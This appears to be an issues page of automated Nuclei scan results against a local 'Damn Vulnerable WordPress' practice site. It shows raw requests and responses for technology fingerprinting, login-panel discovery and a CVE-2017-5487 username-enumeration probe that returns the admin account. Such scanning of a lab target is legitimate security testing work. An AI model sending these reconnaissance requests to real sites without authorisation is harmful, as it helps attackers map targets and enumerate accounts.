wordpress-application's People
wordpress-application's Issues
[addeventlistener-detect] [info] AddEventlistener detection found on http://127.0.0.1:31337
Details: addeventlistener-detect matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Wed Jul 7 00:11:20 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | AddEventlistener detection |
author | yavolo |
severity | info |
tags | xss |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:19 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=KXdqrAcmCGywG76AaFd5Axbj32pp9TzL; expires=Fri, 09-Jul-2021 00:11:19 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Reference:
Generated by Nuclei
[tech-detect:apache] [info] Wappalyzer Technology Detection found on http://127.0.0.1:31337
Details: tech-detect:apache matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Tue Jul 6 13:46:34 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | tech |
name | Wappalyzer Technology Detection |
author | hakluke |
severity | info |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:34 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=XsfEF5n3CjQsx2bSaB2eEsGpq9e3yxqK; expires=Thu, 08-Jul-2021 13:46:34 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Generated by Nuclei
[wordpress-xmlrpc-file] [info] WordPress xmlrpc found on http://127.0.0.1:31337
Details: wordpress-xmlrpc-file matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/xmlrpc.php
Timestamp: Thu Jul 8 00:10:43 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | WordPress xmlrpc |
author | udit_thakkur |
severity | info |
tags | wordpress |
Request
GET /xmlrpc.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 405 Method Not Allowed
Connection: close
Content-Length: 42
Allow: POST
Content-Type: text/plain;charset=UTF-8
Date: Thu, 08 Jul 2021 00:10:43 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=47jMZnNEpFx5nkG6ra1bHFzHQqhFb915; expires=Sat, 10-Jul-2021 00:10:43 GMT; Max-Age=172800; path=/
X-Powered-By: PHP/7.1.33
XML-RPC server accepts POST requests only.
Generated by Nuclei
[adminer-panel] [info] Adminer Login panel found on http://127.0.0.1:31337
Details: adminer-panel matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/adminer.php
Timestamp: Wed Jul 7 00:11:31 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | panel |
name | Adminer Login panel |
author | random_robbie,meme-lord |
severity | info |
Request
GET /adminer.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-N2NjNDJiODhjNWIwNGEzOWYyMjM0YmU2NGE4ZWUwM2U=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Type: text/html; charset=utf-8
Date: Wed, 07 Jul 2021 00:11:31 GMT
Referrer-Policy: origin-when-cross-origin
Server: Apache/2.4.38 (Debian)
Set-Cookie: adminer_sid=7ee5626c90e55f4a3de60a8c213dc56f; path=/adminer.php; HttpOnly
Set-Cookie: adminer_key=2af6537f76667ef11bb96cc07145786e; path=/adminer.php; HttpOnly; SameSite=lax
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Powered-By: PHP/7.1.33
X-Xss-Protection: 0
<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="stylesheet" type="text/css" href="adminer.php?file=default.css&version=4.6.2">
<script src='adminer.php?file=functions.js&version=4.6.2' nonce="N2NjNDJiODhjNWIwNGEzOWYyMjM0YmU2NGE4ZWUwM2U="></script>
<link rel="shortcut icon" type="image/x-icon" href="adminer.php?file=favicon.ico&version=4.6.2">
<link rel="apple-touch-icon" href="adminer.php?file=favicon.ico&version=4.6.2">
<body class="ltr nojs">
<script nonce="N2NjNDJiODhjNWIwNGEzOWYyMjM0YmU2NGE4ZWUwM2U=">
mixin(document.body, {onkeydown: bodyKeydown, onclick: bodyClick, onload: partial(verifyVersion, '4.6.2', 'adminer.php?', '320384:67072')});
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = 'You are offline.';
var thousandsSeparator = ',';
</script>
<div id="help" class="jush-sql jsonly hidden"></div>
<script nonce="N2NjNDJiODhjNWIwNGEzOWYyMjM0YmU2NGE4ZWUwM2U=">mixin(qs('#help'), {onmouseover: function () { helpOpen = 1; }, onmouseout: helpMouseout});</script>
<div id="content">
<h2>Login</h2>
<div id='ajaxstatus' class='jsonly hidden'></div>
<form action='' method='post'>
<div></div>
<table cellspacing="0">
<tr><th>System<td><select name='auth[driver]'><option value="server" selected>MySQL<option value="sqlite">SQLite 3<option value="sqlite2">SQLite 2<option value="pgsql">PostgreSQL<option value="oracle">Oracle (beta)<option value="mssql">MS SQL (beta)<option value="firebird">Firebird (alpha)<option value="simpledb">SimpleDB<option value="mongo">MongoDB<option value="elastic">Elasticsearch (beta)</select>
<tr><th>Server<td><input name="auth[server]" value="" title="hostname[:port]" placeholder="localhost" autocapitalize="off">
<tr><th>Username<td><input name="auth[username]" id="username" value="" autocapitalize="off">
<tr><th>Password<td><input type="password" name="auth[password]">
<tr><th>Database<td><input name="auth[db]" value="" autocapitalize="off">
</table>
<script nonce="N2NjNDJiODhjNWIwNGEzOWYyMjM0YmU2NGE4ZWUwM2U=">focus(qs('#username'));</script>
<p><input type='submit' value='Login'>
<label><input type='checkbox' name='auth[permanent]' value='1'>Permanent login</label>
</form>
</div>
<form action='' method='post'>
<div id='lang'>Language: <select name='lang'><option value="en" selected>English<option value="ar">العربية<option value="bg">Български<option value="bn">বাংলা<option value="bs">Bosanski<option value="ca">Català<option value="cs">Čeština<option value="da">Dansk<option value="de">Deutsch<option value="el">Ελληνικά<option value="es">Español<option value="et">Eesti<option value="fa">فارسی<option value="fi">Suomi<option value="fr">Français<option value="gl">Galego<option value="he">עברית<option value="hu">Magyar<option value="id">Bahasa Indonesia<option value="it">Italiano<option value="ja">日本語<option value="ko">한국어<option value="lt">Lietuvių<option value="ms">Bahasa Melayu<option value="nl">Nederlands<option value="no">Norsk<option value="pl">Polski<option value="pt">Português<option value="pt-br">Português (Brazil)<option value="ro">Limba Română<option value="ru">Русский<option value="sk">Slovenčina<option value="sl">Slovenski<option value="sr">Српски<option value="ta">தமிழ்<option value="th">ภาษาไทย<option value="tr">Türkçe<option value="uk">Українська<option value="vi">Tiếng Việt<option value="zh">简体中文<option value="zh-tw">繁體中文</select><script nonce="N2NjNDJiODhjNWIwNGEzOWYyMjM0YmU2NGE4ZWUwM2U=">qsl('select').onchange = function () { this.form.submit(); };</script> <input type='submit' value='Use' class='hidden'>
<input type='hidden' name='token' value='815556:627780'>
</div>
</form>
<div id="menu">
<h1>
<a href='https://www.adminer.org/' target="_blank" rel="noreferrer noopener" id='h1'>Adminer</a> <span class="version">4.6.2</span>
<a href="https://www.adminer.org/#download" target="_blank" rel="noreferrer noopener" id="version"></a>
</h1>
</div>
<script nonce="N2NjNDJiODhjNWIwNGEzOWYyMjM0YmU2NGE4ZWUwM2U=">setupSubmitHighlight(document);</script>
Extra Information
Extracted results:
- 4.6.2
Reference:
Generated by Nuclei
[wordpress-panel] [info] WordPress Panel found on http://127.0.0.1:31337
Details: wordpress-panel matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/wp-login.php
Timestamp: Tue Jul 6 13:46:48 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | WordPress Panel |
author | github.com/its0x08 |
severity | info |
tags | panel |
Request
GET /wp-login.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:48 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<!--<![endif]-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Log In ‹ Damn Vulnerable WordPress — WordPress</title>
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='dashicons-css' href='http://127.0.0.1:31337/wp-includes/css/dashicons.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='buttons-css' href='http://127.0.0.1:31337/wp-includes/css/buttons.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='forms-css' href='http://127.0.0.1:31337/wp-admin/css/forms.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='l10n-css' href='http://127.0.0.1:31337/wp-admin/css/l10n.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='login-css' href='http://127.0.0.1:31337/wp-admin/css/login.min.css?ver=5.3' media='all' />
<meta name='robots' content='noindex,noarchive' />
<meta name='referrer' content='strict-origin-when-cross-origin' />
<meta name="viewport" content="width=device-width" />
</head>
<body class="login no-js login-action-login wp-core-ui locale-en-us">
<script type="text/javascript">
document.body.className = document.body.className.replace('no-js','js');
</script>
<div id="login">
<h1><a href="https://wordpress.org/">Powered by WordPress</a></h1>
<form name="loginform" id="loginform" action="http://127.0.0.1:31337/wp-login.php" method="post">
<p>
<label for="user_login">Username or Email Address</label>
<input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" />
</p>
<div class="user-pass-wrap">
<label for="user_pass">Password</label>
<div class="wp-pwd">
<input type="password" name="pwd" id="user_pass" class="input password-input" value="" size="20" />
<button type="button" class="button button-secondary wp-hide-pw hide-if-no-js" data-toggle="0" aria-label="Show password">
<span class="dashicons dashicons-visibility" aria-hidden="true"></span>
</button>
</div>
</div>
<p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /> <label for="rememberme">Remember Me</label></p>
<p class="submit">
<input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" />
<input type="hidden" name="redirect_to" value="http://127.0.0.1:31337/wp-admin/" />
<input type="hidden" name="testcookie" value="1" />
</p>
</form>
<p id="nav">
<a href="http://127.0.0.1:31337/wp-login.php?action=lostpassword">Lost your password?</a>
</p>
<script type="text/javascript">
function wp_attempt_focus() {setTimeout( function() {try {d = document.getElementById( "user_login" );d.focus(); d.select();} catch( er ) {}}, 200);}
wp_attempt_focus();
if ( typeof wpOnload === 'function' ) { wpOnload() } </script>
<p id="backtoblog"><a href="http://127.0.0.1:31337/">
← Back to Damn Vulnerable WordPress </a></p>
</div>
<script src='http://127.0.0.1:31337/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script src='http://127.0.0.1:31337/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script>
var _zxcvbnSettings = {"src":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/zxcvbn.min.js"};
</script>
<script src='http://127.0.0.1:31337/wp-includes/js/zxcvbn-async.min.js?ver=1.0'></script>
<script>
var pwsL10n = {"unknown":"Password strength unknown","short":"Very weak","bad":"Weak","good":"Medium","strong":"Strong","mismatch":"Mismatch"};
</script>
<script src='http://127.0.0.1:31337/wp-admin/js/password-strength-meter.min.js?ver=5.3'></script>
<script src='http://127.0.0.1:31337/wp-includes/js/underscore.min.js?ver=1.8.3'></script>
<script>
var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};
</script>
<script src='http://127.0.0.1:31337/wp-includes/js/wp-util.min.js?ver=5.3'></script>
<script>
var userProfileL10n = {"warn":"Your new password has not been saved.","warnWeak":"Confirm use of weak password","show":"Show","hide":"Hide","cancel":"Cancel","ariaShow":"Show password","ariaHide":"Hide password"};
</script>
<script src='http://127.0.0.1:31337/wp-admin/js/user-profile.min.js?ver=5.3'></script>
<script>
/(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.... Truncated ....
Generated by Nuclei
[CVE-2017-5487] [medium] WordPress Core < 4.7.1 - Username Enumeration found on http://127.0.0.1:31337
Details: CVE-2017-5487 matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/?rest_route=/wp/v2/users/
Timestamp: Thu Jul 8 00:11:02 +0000 UTC 2021
Template Information
Key | Value |
---|---|
author | Manas_Harsh,daffainfo |
severity | medium |
description | wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. |
tags | cve,cve2017,wordpress |
name | WordPress Core < 4.7.1 - Username Enumeration |
Request
GET /?rest_route=/wp/v2/users/ HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 584
Access-Control-Allow-Headers: Authorization, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Allow: GET
Content-Type: application/json; charset=UTF-8
Date: Thu, 08 Jul 2021 00:11:02 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=PQGYpGHpwHjW4Zrhyed2F49HbfjYqRxX; expires=Sat, 10-Jul-2021 00:11:02 GMT; Max-Age=172800; path=/
Vary: Origin
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.1.33
X-Robots-Tag: noindex
X-Wp-Total: 1
X-Wp-Totalpages: 1
[{"id":1,"name":"admin","url":"","description":"","link":"http:\/\/127.0.0.1:31337\/?author=1","slug":"admin","avatar_urls":{"24":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=24&d=mm&r=g","48":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=48&d=mm&r=g","96":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/127.0.0.1:31337\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"http:\/\/127.0.0.1:31337\/index.php?rest_route=\/wp\/v2\/users"}]}}]
Reference:
Generated by Nuclei
[tech-detect:wordpress] [info] Wappalyzer Technology Detection found on http://127.0.0.1:31337
Details: tech-detect:wordpress matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Tue Jul 6 13:46:34 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | tech |
name | Wappalyzer Technology Detection |
author | hakluke |
severity | info |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:34 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=XsfEF5n3CjQsx2bSaB2eEsGpq9e3yxqK; expires=Thu, 08-Jul-2021 13:46:34 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
